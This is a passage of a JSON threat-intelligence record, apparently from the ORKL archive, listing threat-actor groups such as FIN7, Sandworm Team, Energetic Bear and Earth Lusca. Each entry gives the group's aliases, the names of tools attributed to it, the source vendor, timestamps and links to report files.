				"Sangria Tempest",
				"ELBRUS",
				"GOLD NIAGARA",
				"Coreid",
				"Carbanak",
				"Carbon Spider",
				"JokerStash",
				"CARBON SPIDER"
			],
			"source_name": "MISPGALAXY:FIN7",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7bd810cb-d674-4763-86eb-2cc182d24ea0",
			"created_at": "2022-10-25T16:07:24.1537Z",
			"updated_at": "2026-04-10T02:00:04.883793Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"APT 44",
				"ATK 14",
				"BE2",
				"Blue Echidna",
				"CTG-7263",
				"FROZENBARENTS",
				"G0034",
				"Grey Tornado",
				"IRIDIUM",
				"Iron Viking",
				"Quedagh",
				"Razing Ursa",
				"Sandworm",
				"Sandworm Team",
				"Seashell Blizzard",
				"TEMP.Noble",
				"UAC-0082",
				"UAC-0113",
				"UAC-0125",
				"UAC-0133",
				"Voodoo Bear"
			],
			"source_name": "ETDA:Sandworm Team",
			"tools": [
				"AWFULSHRED",
				"ArguePatch",
				"BIASBOAT",
				"Black Energy",
				"BlackEnergy",
				"CaddyWiper",
				"Colibri Loader",
				"Cyclops Blink",
				"CyclopsBlink",
				"DCRat",
				"DarkCrystal RAT",
				"Fobushell",
				"GOSSIPFLOW",
				"Gcat",
				"IcyWell",
				"Industroyer2",
				"JaguarBlade",
				"JuicyPotato",
				"Kapeka",
				"KillDisk.NCX",
				"LOADGRIP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"ORCSHRED",
				"P.A.S.",
				"PassKillDisk",
				"Pitvotnacci",
				"PsList",
				"QUEUESEED",
				"RansomBoggs",
				"RottenPotato",
				"SOLOSHRED",
				"SwiftSlicer",
				"VPNFilter",
				"Warzone",
				"Warzone RAT",
				"Weevly"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "75455540-2f6e-467c-9225-8fe670e50c47",
			"created_at": "2022-10-25T16:07:23.740266Z",
			"updated_at": "2026-04-10T02:00:04.732992Z",
			"deleted_at": null,
			"main_name": "Iridium",
			"aliases": [],
			"source_name": "ETDA:Iridium",
			"tools": [
				"CHINACHOPPER",
				"China Chopper",
				"LazyCat",
				"Powerkatz",
				"SinoChopper",
				"reGeorg"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bfded1cf-be73-44f9-a391-0751c9996f9a",
			"created_at": "2022-10-25T15:50:23.337107Z",
			"updated_at": "2026-04-10T02:00:05.252413Z",
			"deleted_at": null,
			"main_name": "FIN7",
			"aliases": [
				"FIN7",
				"GOLD NIAGARA",
				"ITG14",
				"Carbon Spider",
				"ELBRUS",
				"Sangria Tempest"
			],
			"source_name": "MITRE:FIN7",
			"tools": [
				"Mimikatz",
				"AdFind",
				"JSS Loader",
				"HALFBAKED",
				"REvil",
				"PowerSploit",
				"CrackMapExec",
				"Carbanak",
				"Pillowmint",
				"Cobalt Strike",
				"POWERSOURCE",
				"RDFSNIFFER",
				"SQLRat",
				"Lizar",
				"TEXTMATE",
				"BOOSTWRITE"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d85adfe3-e1c3-40b0-b8bb-d1bacadc4d82",
			"created_at": "2022-10-25T16:07:23.619566Z",
			"updated_at": "2026-04-10T02:00:04.690061Z",
			"deleted_at": null,
			"main_name": "FIN7",
			"aliases": [
				"APT-C-11",
				"ATK 32",
				"G0046",
				"Gold Niagara",
				"GrayAlpha",
				"ITG14",
				"TAG-CR1"
			],
			"source_name": "ETDA:FIN7",
			"tools": [
				"7Logger",
				"Agentemis",
				"Anubis Backdoor",
				"Anunak",
				"Astra",
				"BIOLOAD",
				"BIRDWATCH",
				"Bateleur",
				"Boostwrite",
				"CROWVIEW",
				"Carbanak",
				"Cobalt Strike",
				"CobaltStrike",
				"DICELOADER",
				"DNSMessenger",
				"FOWLGAZE",
				"HALFBAKED",
				"JSSLoader",
				"KillACK",
				"LOADOUT",
				"Lizar",
				"Meterpreter",
				"Mimikatz",
				"NetSupport",
				"NetSupport Manager",
				"NetSupport Manager RAT",
				"NetSupport RAT",
				"NetSupportManager RAT",
				"POWERPLANT",
				"POWERSOURCE",
				"RDFSNIFFER",
				"Ragnar Loader",
				"SQLRAT",
				"Sardonic",
				"Sekur",
				"Sekur RAT",
				"TEXTMATE",
				"Tirion",
				"VB Flash",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434025,
	"ts_updated_at": 1775792229,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/19c3e75214a9de6ed66964ca8dd50d0f823345cc.pdf",
		"text": "https://archive.orkl.eu/19c3e75214a9de6ed66964ca8dd50d0f823345cc.txt",
		"img": "https://archive.orkl.eu/19c3e75214a9de6ed66964ca8dd50d0f823345cc.jpg"
	}
}